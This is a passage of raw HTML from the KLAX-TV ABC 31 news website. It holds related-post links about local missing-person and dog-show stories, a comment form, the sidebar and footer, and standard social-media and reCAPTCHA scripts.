            <span class="comments"><i class="fa fa-comment"></i><span>Comments Off<span class="screen-reader-text"> on Rat Terriers Make Debut Performance in Dog Show</span></span></span>
         </div>

      </div>

   </div><!--/.related-->
      <div class="single-related-posts">

      
      <div class="article-content">

         <h3 class="entry-title">
            <a href="http://klax-tv.com/natchitoches-deputies-search-for-elderly-couple/" rel="bookmark" title="Natchitoches Deputies Search for Elderly Couple">Natchitoches Deputies Search for Elderly Couple</a>
         </h3><!--/.post-title-->

         <div class="below-entry-meta">
            <span class="posted-on"><a href="http://klax-tv.com/natchitoches-deputies-search-for-elderly-couple/" title="1:56 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published" datetime="2015-01-22T13:56:27+00:00">January 22, 2015</time></a></span>            <span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/sally-2/" title="KLAX TV, ABC 31">KLAX TV, ABC 31</a></span></span>
            <span class="comments"><i class="fa fa-comment"></i><span>Comments Off<span class="screen-reader-text"> on Natchitoches Deputies Search for Elderly Couple</span></span></span>
         </div>

      </div>

   </div><!--/.related-->
      <div class="single-related-posts">

               <div class="related-posts-thumbnail">
            <a href="http://klax-tv.com/rpso-searching-for-missing-juvenile/" title="RPSO Searching for Missing Juvenile">
               <img width="390" height="205" src="http://klax-tv.com/wp-content/uploads/2017/08/Missing_Kristen_Mancil-1-390x205.jpg" class="attachment-colormag-featured-post-medium size-colormag-featured-post-medium wp-post-image" alt="" />            </a>
         </div>
      
      <div class="article-content">

         <h3 class="entry-title">
            <a href="http://klax-tv.com/rpso-searching-for-missing-juvenile/" rel="bookmark" title="RPSO Searching for Missing Juvenile">RPSO Searching for Missing Juvenile</a>
         </h3><!--/.post-title-->

         <div class="below-entry-meta">
            <span class="posted-on"><a href="http://klax-tv.com/rpso-searching-for-missing-juvenile/" title="1:33 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published" datetime="2017-08-30T13:33:00+00:00">August 30, 2017</time></a></span>            <span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/susankt/" title="KLAX-TV ABC 31">KLAX-TV ABC 31</a></span></span>
            <span class="comments"><i class="fa fa-comment"></i><span>Comments Off<span class="screen-reader-text"> on RPSO Searching for Missing Juvenile</span></span></span>
         </div>

      </div>

   </div><!--/.related-->
   
</div><!--/.post-related-->


      
<div id="comments" class="comments-area">

	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/#respond" style="display:none;">Cancel reply</a></small></h3>			<form action="http://klax-tv.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<div class="gglcptch gglcptch_v2"><div id="gglcptch_recaptcha_542718049" class="gglcptch_recaptcha"></div>
				<noscript>
					<div style="width: 302px;">
						<div style="width: 302px; height: 422px; position: relative;">
							<div style="width: 302px; height: 422px; position: absolute;">
								<iframe src="https://www.google.com/recaptcha/api/fallback?k=6LcJUPMSAAAAAEnli02Dj7ZdXKtI9W4FGTJ_CQIW" frameborder="0" scrolling="no" style="width: 302px; height:422px; border-style: none;"></iframe>
							</div>
						</div>
						<div style="border-style: none; bottom: 12px; left: 25px; margin: 0px; padding: 0px; right: 25px; background: #f9f9f9; border: 1px solid #c1c1c1; border-radius: 3px; height: 60px; width: 300px;">
							<textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px !important; height: 40px !important; border: 1px solid #c1c1c1 !important; margin: 10px 25px !important; padding: 0px !important; resize: none !important;"></textarea>
						</div>
					</div>
				</noscript></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='63479' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments -->
	</div><!-- #primary -->

	
<div id="secondary">
			
		<aside id="adrotate_widgets-53" class="widget adrotate_widgets clearfix"><!-- Error, Ad is not available at this time due to schedule/geolocation restrictions! --></aside><aside id="adrotate_widgets-36" class="widget adrotate_widgets clearfix"><!-- Error, Ad is not available at this time due to schedule/geolocation restrictions! --></aside><aside id="media_image-19" class="widget widget_media_image clearfix"><img width="232" height="300" src="http://klax-tv.com/wp-content/uploads/2019/02/51781260_309731576396433_768896839310114816_o-232x300.jpg" class="image wp-image-63436  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2019/02/51781260_309731576396433_768896839310114816_o-232x300.jpg 232w, http://klax-tv.com/wp-content/uploads/2019/02/51781260_309731576396433_768896839310114816_o-768x994.jpg 768w, http://klax-tv.com/wp-content/uploads/2019/02/51781260_309731576396433_768896839310114816_o-791x1024.jpg 791w, http://klax-tv.com/wp-content/uploads/2019/02/51781260_309731576396433_768896839310114816_o.jpg 1418w" sizes="(max-width: 232px) 100vw, 232px" /></aside><aside id="media_image-15" class="widget widget_media_image clearfix"><img width="195" height="260" src="http://klax-tv.com/wp-content/uploads/2019/01/strahan-an-sara.jpg" class="image wp-image-63139  attachment-full size-full" alt="" style="max-width: 100%; height: auto;" /></aside><aside id="media_image-11" class="widget widget_media_image clearfix"><img width="300" height="166" src="http://klax-tv.com/wp-content/uploads/2019/01/ROC-300x166.png" class="image wp-image-62997  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2019/01/ROC-300x166.png 300w, http://klax-tv.com/wp-content/uploads/2019/01/ROC-768x424.png 768w, http://klax-tv.com/wp-content/uploads/2019/01/ROC-1024x565.png 1024w, http://klax-tv.com/wp-content/uploads/2019/01/ROC-800x445.png 800w, http://klax-tv.com/wp-content/uploads/2019/01/ROC.png 1200w" sizes="(max-width: 300px) 100vw, 300px" /></aside><aside id="media_image-13" class="widget widget_media_image clearfix"><img width="300" height="134" src="http://klax-tv.com/wp-content/uploads/2019/01/OPT-Promo-300x134.jpg" class="image wp-image-62999  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2019/01/OPT-Promo-300x134.jpg 300w, http://klax-tv.com/wp-content/uploads/2019/01/OPT-Promo-768x344.jpg 768w, http://klax-tv.com/wp-content/uploads/2019/01/OPT-Promo.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></aside>
	</div>
	

</div><!-- .inner-wrap -->
</div><!-- #main -->




<footer id="colophon" class="clearfix ">
	
<div class="footer-widgets-wrapper">
	<div class="inner-wrap">
		<div class="footer-widgets-area clearfix">
         <div class="tg-footer-main-widget">
   			<div class="tg-first-footer-widget">
   				<aside id="text-31" class="widget widget_text clearfix"><h3 class="widget-title"><span>About Us</span></h3>			<div class="textwidget">KLAX ABC 31 is Central Louisiana’s source for ABC entertainment, news and sports programming.  In addition to ABC’s award-winning content, KLAX delivers a variety of top-rated syndicated programming, and local news, weather and sports through ABC 31 News. <a href="http://klax-tv.com/about/">Read more...</a></div>
		</aside>   			</div>
         </div>
         <div class="tg-footer-other-widgets">
   			<div class="tg-second-footer-widget">
   				<aside id="linkcat-5" class="widget widget_links clearfix"><h3 class="widget-title"><span>Useful Links</span></h3>
	<ul class='xoxo blogroll'>
<li><a href="http://abc.go.com/" title="Watch ABC shows online!" target="_blank">Watch ABC On-Demand</a></li>
<li><a href="http://www.metv.com" target="_blank">Me-TV Alexandria</a></li>
<li><a href="http://klax-tv.com/gas-buddy/">Gas Buddy</a></li>
<li><a href="http://www.littonweekendadventure.com/">Litton&#039;s Weekend Adventure</a></li>
<li><a href="http://abcnews.go.com/health%20">ABC Health News</a></li>
<li><a href="http://abcnews.go.com/">ABC News</a></li>
<li><a href="https://klaxtv.securepayments.cardpointe.com/pay?total=0.00" title="Make a credit card payment for advertising invoices">Make a payment</a></li>

	</ul>
</aside>
   			</div>
            <div class="tg-third-footer-widget">
               <aside id="theme-my-login-3" class="widget widget_theme_my_login clearfix"><h3 class="widget-title"><span>Log In</span></h3>
<div class="tml tml-login" id="theme-my-login1">
			<form name="loginform" id="loginform1" action="/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/?instance=1" method="post">
		<p class="tml-user-login-wrap">
			<label for="user_login1">Username</label>
			<input type="text" name="log" id="user_login1" class="input" value="" size="20" />
		</p>

		<p class="tml-user-pass-wrap">
			<label for="user_pass1">Password</label>
			<input type="password" name="pwd" id="user_pass1" class="input" value="" size="20" autocomplete="off" />
		</p>

		<input type="hidden" name="_wp_original_http_referer" value="/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/" />
		<div class="tml-rememberme-submit-wrap">
			<p class="tml-rememberme-wrap">
				<input name="rememberme" type="checkbox" id="rememberme1" value="forever" />
				<label for="rememberme1">Remember Me</label>
			</p>

			<p class="tml-submit-wrap">
				<input type="submit" name="wp-submit" id="wp-submit1" value="Log In" />
				<input type="hidden" name="redirect_to" value="http://klax-tv.com/wp-admin/" />
				<input type="hidden" name="instance" value="1" />
				<input type="hidden" name="action" value="login" />
			</p>
		</div>
	</form>
	<ul class="tml-action-links">
<li><a href="http://klax-tv.com/register/" rel="nofollow">Register</a></li>
<li><a href="http://klax-tv.com/lostpassword/" rel="nofollow">Lost Password</a></li>
</ul>
</div>
</aside>
            </div>
            <div class="tg-fourth-footer-widget">
               <aside id="colormag_125x125_advertisement_widget-6" class="widget widget_125x125_advertisement clearfix">
		<div class="advertisement_125x125">
			<div class="advertisement-content"><a href="http://www.tmz.com" class="single_ad_125x125" target="_blank" rel="nofollow">
                                 <img src="http://klax-tv.com/wp-content/uploads/2016/09/tmz.png" width="125" height="125" alt="">
                              </a></div>		</div>
		</aside>            </div>
         </div>
		</div>
	</div>
</div>	<div class="footer-socket-wrapper clearfix">
		<div class="inner-wrap">
			<div class="footer-socket-area">
				<div class="footer-socket-right-section">
							<div class="social-links clearfix">
			<ul>
				<li><a href="http://www.Facebook.com/KLAX31" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://twitter.com/KLAXTV" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/klaxtv/" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://www.youtube.com/klaxproduction" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
						</div>

				<div class="footer-socket-left-section">
					<div class="copyright">Copyright &copy; 2019 <a href="http://klax-tv.com/" title="KLAX-TV" ><span>KLAX-TV</span></a>. All rights reserved.<br>Theme: ColorMag by <a href="https://themegrill.com/themes/colormag" target="_blank" title="ThemeGrill" rel="author"><span>ThemeGrill</span></a>. Powered by <a href="https://wordpress.org" target="_blank" title="WordPress"><span>WordPress</span></a>.</div>				</div>
			</div>
		</div>
	</div>
</footer>

<a href="#masthead" id="scroll-up"><i class="fa fa-chevron-up"></i></a>

</div><!-- #page -->
			<div id="fb-root"></div>
			<script>(function(d, s, id) {
				var js, fjs = d.getElementsByTagName(s)[0]; 

				if (d.getElementById(id)) return;
				js = d.createElement(s); js.id = id;

				js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=1443946719181573&version=v2.12";
				fjs.parentNode.insertBefore(js, fjs);
				}(document, 'script', 'facebook-jssdk'));
			</script>
					<script type="text/javascript">
				!function(d,s,id) {var js,fjs=d.getElementsByTagName(s)[0];if (!d.getElementById(id)) {js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
			</script>
							<div class="mtsnb mtsnb-shown mtsnb-top mtsnb-fixed" id="mtsnb-63448" data-mtsnb-id="63448" style="background-color:#d10e0e;color:#ffffff;">
				<style type="text/css">
					.mtsnb { position: fixed; -webkit-box-shadow: 0 3px 4px rgba(0, 0, 0, 0.05);box-shadow: 0 3px 4px rgba(0, 0, 0, 0.05);}
					.mtsnb .mtsnb-container { width: 1080px; font-size: 15px;}
					.mtsnb a { color: #ffffff;}
					.mtsnb .mtsnb-button { background-color: #ffffff;}
				</style>
				<div class="mtsnb-container-outer">
					<div class="mtsnb-container mtsnb-clearfix">
												<div class="mtsnb-button-type mtsnb-content"><span class="mtsnb-text"></span><a href="http://klax-tv.com/stations-off-directv/" class="mtsnb-link">Lost Our Channels? Click Here for Special Announcement and Updates Regarding DIRECTV Customers</a></div>											</div>
									</div>
			</div>
					<script>
		( function ( body ) {
			'use strict';
			body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' );
		} )( document.body );
		</script>
		<script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done"}};var tribe_system_info = {"sysinfo_optin_nonce":"d41fe79bf8","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};/* ]]> */ </script><script type='text/javascript'>
/* <![CDATA[ */
var click_object = {"ajax_url":"http:\/\/klax-tv.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/comment-reply.min.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/jquery.bxslider.min.js?ver=4.2.10'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/colormag-slider-setting.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/navigation.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/news-ticker/jquery.newsTicker.min.js?ver=1.0.0'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/news-ticker/ticker-setting.js?ver=20150304'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/sticky/jquery.sticky.js?ver=20150309'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/sticky/sticky-setting.js?ver=20150309'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/fitvids/jquery.fitvids.js?ver=20150311'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/fitvids/fitvids-setting.js?ver=20150311'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/wp-embed.min.js?ver=4.9.9'></script>
<script type='text/javascript' data-cfasync="false" async="async" defer="defer" src='https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=1.37'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var gglcptch = {"options":{"version":"v2","sitekey":"6LcJUPMSAAAAAEnli02Dj7ZdXKtI9W4FGTJ_CQIW","theme":"light","error":"<strong>Warning<\/strong>:&nbsp;More than one reCAPTCHA has been found in the current form. Please remove all unnecessary reCAPTCHA fields to make it work properly."},"vars":{"visibility":false}};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/google-captcha/js/script.js?ver=1.37'></script>
</body>
</html>
